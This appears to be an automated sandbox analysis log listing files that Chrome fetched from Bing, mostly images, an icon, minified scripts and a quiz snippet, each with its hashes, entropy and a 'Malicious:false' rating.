                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j5.Y.<..f.-.s.H.E..Z..+..M_..m.U.[Nz~......*8m6<.........V!...C...N..>. ..O.r..1R....b4#..#.Z.1.X.*EO.....@.K.iSb...R.....b....E..l...jAE+..G........c..G..8..>o.....ak...c:.{..+...:N+s........6L.......#c.....^\.'.>...uK..H2p....c5.a0..^[.<..O..S_....M.=.M.......".uB...ha...2.U.1.[e....L.".....H..l..m....z.HA..'.E*T..5lc.o.T.....W.....Q;)..9..Bj.....{e#
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):24024
                                                                                                                                                                                                                                                                        Entropy (8bit):7.966844333163851
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:eMdwk5XFqt9lvGnzxoSI2PtLSOdIOQFn//OKV8V+uK8YsuWLRyJ2:eMd151qtqzx3HkB/OKV8VL+BW0J2
                                                                                                                                                                                                                                                                        MD5:7F1C78F2CD6FB2C6328B4B08C4D59D0C
                                                                                                                                                                                                                                                                        SHA1:2E9129872556B279C09322419B556E21C93482CC
                                                                                                                                                                                                                                                                        SHA-256:CA4E4F8A09800325AFD2D53965371F283B0F66F8A2EF6D24AEF235B4BD70DDBD
                                                                                                                                                                                                                                                                        SHA-512:36197A3F6EBA8CE4ADA0A8A8D71338DAF732C89EA1EB90B8A180185309F861AEF82AACCC0A9DFDCEF27AC5DDFD460F5DBA03D1456E4051D5372AAE9C00FC0970
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://th.bing.com/th?id=ORMS.b9cdb3444a44a22086f9421426a5b0a7&pid=Wdp&w=300&h=225&qlt=90&c=1&rs=1
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....h...bQ......o.. ...8d..f.o*...W...H.........s_.....q.X.H.l(.j.....d|S........k*.*.....k.G...wFt.b.]...q...`...sG..Kh.....|W.....o..m..Eq..H#[...[.!]O#88<.(vkA..;3.;...YT.X.....I.P..][.{+.&&'i/......A..8...7.:..k&h.......c....k7.:.6,.U}....]A.v..>.`...............#.D....U.F..aSF..d...dn.vx=8=..G3..ix.;q.Oj.._..s.g.OL.S...a..H..`.x#.>\....\.@8..4..l....%?).q.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):581
                                                                                                                                                                                                                                                                        Entropy (8bit):4.460231157732567
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:trZvnltuIvsbhdMLPI7eoxnoFWlW9iVSLS0EwNL4RKFz:tVvnjuRuTUCd9iP7wNLuKFz
                                                                                                                                                                                                                                                                        MD5:C86E4BDE4AF4415501A5E317ED8E28CD
                                                                                                                                                                                                                                                                        SHA1:B89F766A58D8F3EA9F794636FC147E85AA4428E2
                                                                                                                                                                                                                                                                        SHA-256:93F814F19D1E28C1B94F11A1B17754FAF4776B910BA693593490FE220B389AA1
                                                                                                                                                                                                                                                                        SHA-512:807E5FECF4CA2F8C941F6E63805037C41DA02118F63C80129EC777634E2B063B407E92C2870107EE47130F27CF71509D726E1474556FDEB070D1E887178457C1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M5.99998 3V6.68895C5.99998 7.13159 5.88246 7.56629 5.65943 7.94863L5.04612 9H10.9538L10.3405 7.94863C10.1175 7.56629 9.99998 7.13159 9.99998 6.68895V3H10.5C10.7761 3 11 2.77614 11 2.5C11 2.22386 10.7761 2 10.5 2H5.49997C5.22383 2 4.99997 2.22386 4.99997 2.5C4.99997 2.77614 5.22383 3 5.49997 3H5.99998ZM11.5372 10H4.46278L3.44536 11.7441C2.86203 12.7441 3.58334 13.9999 4.74103 13.9999H11.2589C12.4166 13.9999 13.1379 12.7441 12.5546 11.7441L11.5372 10Z" fill="#767676"/></svg>
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1274), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1274
                                                                                                                                                                                                                                                                        Entropy (8bit):5.30620342636407
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:+Fq4YTsQF61KWllWeM2lSoiLKiUfpIYdk+fzWPn8X0kdo6QBUf4JPwk:+FGF6UYXEBi9k5P8OPUY
                                                                                                                                                                                                                                                                        MD5:A969230A51DBA5AB5ADF5877BCC28CFA
                                                                                                                                                                                                                                                                        SHA1:7C4CDC6B86CA3B8A51BA585594EA1AB7B78B8265
                                                                                                                                                                                                                                                                        SHA-256:8E572950CBDA0558F7B9563CE4F5017E06BC9C262CF487E33927A948F8D78F7F
                                                                                                                                                                                                                                                                        SHA-512:F45B08818A54C5FD54712C28EB2AC3417EEA971C653049108E8809D078F6DD0560C873CEB09C8816ECD08112A007C13D850E2791F62C01D68518B3C3D0ACCCEB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:var Identity=Identity||{};(function(n,t,i,r,u,f,e){e.wlProfile=function(){var r=sj_cook.get,u="WLS",t=r(u,"N"),i=r(u,"C");return i&&e.wlImgSm&&e.wlImgLg?{displayName:t?t.replace(/\+/g," "):"",name:n(t.replace(/\+/g," ")),img:e.wlImgSm.replace(/\{0\}/g,f(i)),imgL:e.wlImgLg.replace(/\{0\}/g,f(i)),idp:"WL"}:null};e.headerLoginMode=0;e.popupAuthenticate=function(n,i,r){var o,u,h,c,v=sb_gt(),l=Math.floor(v/1e3).toString(),s="ct",a=new RegExp("([?&])"+s+"=.*?(&|$)","i");return n.toString()==="WindowsLiveId"&&(o=e.popupLoginUrls,u=o[n],u=u.match(a)?u.replace(a,"$1"+s+"="+l+"$2"):u+"?"+s+"="+l,e.popupLoginUrls.WindowsLiveId=u),(o=e.popupLoginUrls)&&(u=o[n]+(i?"&perms="+f(i):"")+(r?"&src="+f(r):""))&&(h=e.pop(u))&&(c=setInterval(function(){h.closed&&(t.fire("id:popup:close"),clearInterval(c))},100))};e.pop=function(n){return r.open(n,"idl","location=no,menubar=no,resizable=no,scrollbars=yes,status=no,titlebar=no,toolbar=no,width=1000,height=620")};var s=u("id_h"),o=u("id_l"),h="click";t.bind("o
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):4629
                                                                                                                                                                                                                                                                        Entropy (8bit):7.907676403428206
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8zgE3vee2ccPCMR79u4pZmlE8zPcsJL/0K80tkpbMDZBLkJ0O:ygHnccnR7PpoEm9R0Ge0BLI
                                                                                                                                                                                                                                                                        MD5:5F05C6E3B26A5182C1FBF8ED56683D0D
                                                                                                                                                                                                                                                                        SHA1:7754D6FD6DB3F7B056DF3E57A43E781FEDF78F20
                                                                                                                                                                                                                                                                        SHA-256:092E3C16140DAC45F765C3D291DE251755406063E784A35295343C75C0E49DCB
                                                                                                                                                                                                                                                                        SHA-512:83C24803C1BBDD75A3618415B758AE09B340327AD05305D836F5189B7552FAB90B12A981E703C543381FC7FA483975282E448D63F95BF1698DDC5B0C2B313C31
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/th?id=OPN.RTNews_s1e_30RBKUuwCSRSsAjb1w&w=186&h=88&c=7&rs=2&qlt=80&pid=PopNow
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......*..{.K...&.....r6....K....1S...wVF..k...&.xu.....X....J.x.]q.<=......g.S......=.c.........%.......#P7.<E...@.......U.pxWN.pm...y2J.O.Z}...{."/..?.$..A.V.g.A..m*.0;....R%..p.......}.$..@.-..p.rK...8.j..6..c....2^..Q.~.....[v..E >...Gn...#w.P..^.g4.nH..S.&d..U".....>o....j\..<..O........>?.m[i.eM..5......K... .}3.{\:.....p..&.i?..[y...$......K.R......?.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):395697
                                                                                                                                                                                                                                                                        Entropy (8bit):5.91590407182338
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:EF31/DZV2feDPlwk0gXFjRdQD8g3DpiUuEv:g1/T2GDbXTDgjB
                                                                                                                                                                                                                                                                        MD5:B54ADBC21E9E3AED86E1DDDE37C5CA97
                                                                                                                                                                                                                                                                        SHA1:4BBEDE66F8265117D5AECF21C9433643D5A792F7
                                                                                                                                                                                                                                                                        SHA-256:AE20917774D90D41E06253B61F72DB157F25A3CF44150AA3BB6780536260CC80
                                                                                                                                                                                                                                                                        SHA-512:5613E3E67FD5BBDD281E96AA20C850B08713EBB6AD181D8B7B935C622E0B8A7B5D6979CD43624D447345D14A426999BD0932C513B3C1FC9CBF49CDE2F608E5EF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/S77eZvgmURfVrs8hyUM2Q9Wnkvc.js
                                                                                                                                                                                                                                                                        Preview:var __assign=this&&this.__assign||function(){return __assign=Object.assign||function(n){for(var t,r,i=1,u=arguments.length;i<u;i++){t=arguments[i];for(r in t)Object.prototype.hasOwnProperty.call(t,r)&&(n[r]=t[r])}return n},__assign.apply(this,arguments)},__rest=this&&this.__rest||function(n,t){var u={},r;for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&t.indexOf(i)<0&&(u[i]=n[i]);if(n!=null&&typeof Object.getOwnPropertySymbols=="function")for(r=0,i=Object.getOwnPropertySymbols(n);r<i.length;r++)t.indexOf(i[r])<0&&Object.prototype.propertyIsEnumerable.call(n,i[r])&&(u[i[r]]=n[i[r]]);return u},__spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))},__awaiter=this&&this.__awaiter||function(n,t,i,r){function u(n){return n instanceof i?n:new i(function(t){t(n)})}return new(i||(i=Promise))(function(i,f){functi
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1225
                                                                                                                                                                                                                                                                        Entropy (8bit):5.268483399933616
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:YuJGpv0vtRWCsG65UGbOoOx7FQLRWCsG65UGpuA+oOYhHHURWCsG65UGRIoXXc:YRl0vAG6JbsQeG6Jg+BHTG6JRu
                                                                                                                                                                                                                                                                        MD5:F7E31D867F86464E752C85C32C5042F5
                                                                                                                                                                                                                                                                        SHA1:3760C207BFBC44427A2784A1DD379EBC92234457
                                                                                                                                                                                                                                                                        SHA-256:ADBE195CDF90F061AF812544C1063E7A2B0DFAE84B47B0A2D571210F6BFDC85B
                                                                                                                                                                                                                                                                        SHA-512:68CB822EE77E58E08E95847A579407C3EF8A60B54E194B1225EDC0EF512ED9A845BD1F0475536B9DCD154BB5B5ED6A141478BCFEEAFAF424489E4253F569B6A7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:{"title":"","data":{"question":"What's the name of this eye-catching building at the CERN particle physics research center?","options":[{"text":"Exploratorium","url":"/search?q=globe+of+science+and+innovation&filters=IsConversation%3A%22True%22+btrequestsource%3A%22homepage%22+WQOskey%3A%22HPQuiz_20231206_CERNCenter%22+WQId%3A%221%22+WQQI%3A%220%22+WQCI%3A%220%22+UserChoices%3A%220%22+ShowTimesTaskPaneTrigger%3A%22false%22+WQSCORE%3A%220%22&FORM=HPQUIZ","bullet":"A"},{"text":"Center for Innovators and Dreamers","url":"/search?q=globe+of+science+and+innovation&filters=IsConversation%3A%22True%22+btrequestsource%3A%22homepage%22+WQOskey%3A%22HPQuiz_20231206_CERNCenter%22+WQId%3A%221%22+WQQI%3A%220%22+WQCI%3A%221%22+UserChoices%3A%221%22+ShowTimesTaskPaneTrigger%3A%22false%22+WQSCORE%3A%220%22&FORM=HPQUIZ","bullet":"B"},{"text":"The Globe of Science and Innovation","url":"/search?q=globe+of+science+and+innovation&filters=IsConversation%3A%22True%22+btrequestsource%3A%22homepage%22+WQOskey
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3363), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):3363
                                                                                                                                                                                                                                                                        Entropy (8bit):5.195022922251816
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:rVnoyUQXHE2ugs6SI7kVsP1mB88bTg7IYeYU5qnjRXpHNXhgkGq:Z+yhCPFy12dbTQ3k5GjZjr
                                                                                                                                                                                                                                                                        MD5:FABB77C7AE3FD2271F5909155FB490E5
                                                                                                                                                                                                                                                                        SHA1:CDE0B1304B558B6DE7503D559C92014644736F88
                                                                                                                                                                                                                                                                        SHA-256:E482BF4BAAA167335F326B9B4F4B83E806CC21FB428B988A4932C806D918771C
                                                                                                                                                                                                                                                                        SHA-512:CABB38F7961AB11449A6E895657D39C947D422F0B3E1DA976494C53203E0E91ADFC514B6100E632939C4335C119165D2330512CAA7D836A6C863087775EDAA9F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/zeCxMEtVi23nUD1VnJIBRkRzb4g.js
                                                                                                                                                                                                                                                                        Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))},AccountLink;(function(n){function h(n,t){var i=a(n.accLinkRefreshEndPointUrl),r={url:i,requestType:"GET",onSuccess:t.onSuccess,onError:t.onError};v(r)}function s(n){var t=c(n);h(n,t)}function c(n){return{onSuccess:function(n){var e=sb_gt(),o=Math.floor(e/1e3)*1e3,f;sj_cook.set(r,u,o.toString(),!0,"/");t("Refresh Account Link info Success");i("onRefreshAccountLinkInfoResponse","success");f={IsTenantAllowAccountLink:n.IsTenantAllowAccountLink,HasLinkedAccount:n.HasLinkedAccount};n.AccountLinkUpdated&&(t("fire acclink:updated"),sj_evt.fire("acclink:updated",f));n.HasLinkedAccount&&n.IsTenantAllowAccountLink&&i("onRefreshAccountLinkInfoResponse","hasActiveLinkedAccount")},onError:function(f,e,o){var s=sb_gt(),h=Math.floor(s/1e3)*1e3,c=h-(n.refreshAccountLink
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):12412
                                                                                                                                                                                                                                                                        Entropy (8bit):7.955100286795984
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:esULsp0eWjZxP9+uUfCHINPnFvsjdW1N05n:e4pzyZj+FKHuZi414
                                                                                                                                                                                                                                                                        MD5:83424BBDE15001754CD2615CCD2E4021
                                                                                                                                                                                                                                                                        SHA1:F23C38D3B1E5FE98DDA52664FB613668E087847B
                                                                                                                                                                                                                                                                        SHA-256:ED065140F836882523191F5C70D2C0EE09EADE9DF6A30032AAC698D5AC142D4E
                                                                                                                                                                                                                                                                        SHA-512:65BD10E07945D704AE8879E7F4935B01229F732E71661729C4101813E86217B391BB095CEF7A6703AC6518776E288C834A9501996BD63D42A47D7B47C763F1E2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://th.bing.com/th?id=ORMS.d201a110a79608b378818c3bb714ef35&pid=Wdp&w=300&h=225&qlt=90&c=1&rs=1
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......6..;..u..\.&.0.K.....V.W,F..S..........N.P.<S.?.D.;4.;sz.c..4.<.....sN...<.@...n.ZNipM+.77....V.0h....i7..?ZE../'.h.G...x..+....5!z.YG...j..#...*..2....2.j7.kkZz........G....W..~..E.A...........O......R.*....k..&|F.....F?.....vu{H....4.*.c.,N...k...?.s.../..m2...s.t#.UN.zpM|....k...+..<.u/.$bb....Q.8.]..3....<DW...'..bF.|o........{q.]6...Wliz......
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):22874
                                                                                                                                                                                                                                                                        Entropy (8bit):7.956599006063644
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:eYrRNI/UNjCZdxNQF9i5WYUJJBzb482YL8J0pFa27TCj0RCgw:eYlNI/pCcS/BX4C8JyFa27BCl
                                                                                                                                                                                                                                                                        MD5:50F6D0B60ED44F87BB6D51E320659B62
                                                                                                                                                                                                                                                                        SHA1:767380807B5FD33C5390313A2E83556C4FC67A2E
                                                                                                                                                                                                                                                                        SHA-256:CBE2CBE9B04B0167AFAAEA76194CE1E4894C3FF27B784E05C7690C641C265F37
                                                                                                                                                                                                                                                                        SHA-512:C6415846829C73926DE6F2248339E52F66E933A6F28B89C709DB3CD32B394F51B5467DE89E4C891CBEB86A4EA308A8F24D09604ED72A56D9AD465A2F3BA837F9
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..V.......c.......l-..........i....'.7..f.6VVv....$.k.Q..qm.'.....#.~].}I.^Yj.[.rx.......w.^.mr.. Lx.U..W.#..H....y.|V.U-...>&.d.'N..rw...Q+........yN..\.c..+....>.+O....a..6P.....$.+{.........k..G..........N.[......2.~OV.+...&........:..#....\..j>.q.U.?.5x.J....w.v...6..g.y_ia......d~54..E.$o&.s.X..*.Kc.X..s...}.....1K....<.5..:c...Z.5......5..g..+.<.o
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):6114
                                                                                                                                                                                                                                                                        Entropy (8bit):7.928989063334699
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8zgEUEwDSeeF0v0ZgB7uyf98koSXslBLb8V9W3/97tBMFtIaqBsoRYA:ygGaSP0KgB7uUSkoisl1b8Gv9LRHPf
                                                                                                                                                                                                                                                                        MD5:DD1C4F6EEA2DA039D5B36F619C2C6ED3
                                                                                                                                                                                                                                                                        SHA1:CA445DC3F48D5176D92F98F953CD8D916DB54F60
                                                                                                                                                                                                                                                                        SHA-256:A9DBBE31E188B2A52F41DB637A5772F94658905B4E85F512F2FF8217F1A56344
                                                                                                                                                                                                                                                                        SHA-512:04DB9B116E3AF0FA2760C0F96F291F384FA789A0F0C5467C47ABDEFEF2B0849DFEE8B95BA1F13445B825617C36CBEE027C121621634871D25B16B0429E96975C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/th?id=OPN.RTNews_RR215KjGG6t9uoXWxNrRjQ&w=186&h=88&c=7&rs=2&qlt=80&pid=PopNow
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...6.}TU.c..E..{...j.G..y.;m......!......N...v.-...r>..i......].5.}1.3..V{{.......w.".J2..\......#.^i+..'......s.,+...Cvz~4..5........MR.P..X.8n.4.a...pGjc2.t...C/....I.(.nk..K..We.[x....1+.e?..\lk..=.....>.?$..V..#e..\..l..cT.....8...8..u%....C.WX"...x.......o!p...<........C...>...p#[~r...*..."........?.kD....?....F!j.....V..V....U.....m.I..c'n>..G.<V.\.c..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 380 x 32, 16-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):2652
                                                                                                                                                                                                                                                                        Entropy (8bit):7.884709708562161
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:javK4OjNcIpDuhI/hQcktCY6np7Rad4iB+sWNEFMm0483DYqTNcw+Cg8oUvQ9hpB:uvMFpDSI/hS6npE4iks0x4KPGwnZQ9h3
                                                                                                                                                                                                                                                                        MD5:5AB91626593CEE8F79A724655354F70A
                                                                                                                                                                                                                                                                        SHA1:F6BA164760F978FB493330FDB5B6844AF3B6257C
                                                                                                                                                                                                                                                                        SHA-256:BB0CEB73EF7F49DBC91DC80467CECA366DCEC34D8B8B45F4983281CC98F9AE11
                                                                                                                                                                                                                                                                        SHA-512:1DA37EBA980A70B695071061E9003D36AAE6D8D64FEEDEA481949B11EF63D4E52D0D29A62B3CABB33859BBF3E74A2769DA6F01D0DEE458F016BF8668BCD726C5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/rp/9roWR2D5ePtJMzD9tbaESvO2JXw.png
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR...|... ......E.:...#IDATx..n.>../....~-......G(ba.. u.C.+.j..JH..A.N........F.u........YQ...9...qns%..#M.....|y0@..^[...X..sS......c..3....7....GG....[].....4.^7...g}..}...~......w.....d.....9/.x...c[...I.....i.~7.$....f.....%..9.v.......Nx.........`.M....o.....4..............^...7.7.l?~?......w..xnn0.u..;...33Z.|..oY......=..W...iv\.`Js.ek.4...........h..gZ.+".)&d.K`...d...A.H.....p..=.}.X..'.m.w.~.>.M30........O./.yV..?..5I.....Q..?\E..3.>H....hq.X........x0..Fj..H.Cy......d b.(..2m.......l...%9..Uu..}.d_..y..Z....m..C....j..k..y....<........paa8L...y3....{".%....o....._O.p.hd.oilWu..T......a....:..-6..@....S.p.^.3....R''.....q.KH.<.../..?.:m.WV..].k........lN...9...1..">.s...{..B....n{P.....^\ll...a@n&.. l....[.._....S..X...{.+...`..~.+.........T....~.....q..>.Z.=)+.a........f&.+uu......j.h....~..a..[...c...j8..._...^.n5.M..u.J.|Z}.`....g.h....J....w....{.~R..T...]N.A...M.N.n..id.>.W...xY.rl/...\..\W9^=...~..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):7759
                                                                                                                                                                                                                                                                        Entropy (8bit):7.90795331559921
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:e7eUpdZ2OTm23v1D/bSknDslHCImSrhqllY3sMhBArHEc:e7eUz+m13Tm2S9/hWr9
                                                                                                                                                                                                                                                                        MD5:DA159126182230AC32BFA5D02AE0C847
                                                                                                                                                                                                                                                                        SHA1:5EF4FEBA1483445A723487CC52C4C7E6810F901E
                                                                                                                                                                                                                                                                        SHA-256:82AEE1A9A274104F1443437C50C6ED5C5CCDD39CF14296054CF68654DC4D1114
                                                                                                                                                                                                                                                                        SHA-512:2CA74D5484665526480AF69E55220436CFA7E47DAA210369890002785C466F322F40AEC9433173122D48C0B89B95F3A42CBFE762769B87C8F6E67CE0755549DE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://th.bing.com/th?id=ORMS.4b86c7866a991e24ff4516c3b7a15da2&pid=Wdp&w=300&h=225&qlt=90&c=1&rs=1
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....4..].{S......c.Pe/+.......G.....&5.Q.:8..W....y".q..6Ryf..E.@.....g....2+C......RU..g.4..m[xXv.4G.*.DC.Se.*.})|...|....pD6.).....Er......J..p......9..*..E....kL...W.#.O..m...=H.4?C~/.............h.5.|`......,....Us_..........,...f......P...I.jhR:.v.5..B..L...J...R.E.J...J...cI.szT..0)..-.FN.EM...A5|.A.@i>l....".((..L.qi...Z.....p.:....X.3Tw5L....f.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (1587), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1589
                                                                                                                                                                                                                                                                        Entropy (8bit):5.24528911504239
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:KyskFELbJnSYVtXpQyL93NzpGaQJWA6vrIhf7:KybibJnSE5aU93HGaQJWAiIh
                                                                                                                                                                                                                                                                        MD5:CB027BA6EB6DD3F033C02183B9423995
                                                                                                                                                                                                                                                                        SHA1:368E7121931587D29D988E1B8CB0FDA785E5D18B
                                                                                                                                                                                                                                                                        SHA-256:04A007926A68BB33E36202EB27F53882AF7FD009C1EC3AD7177FBA380A5FB96F
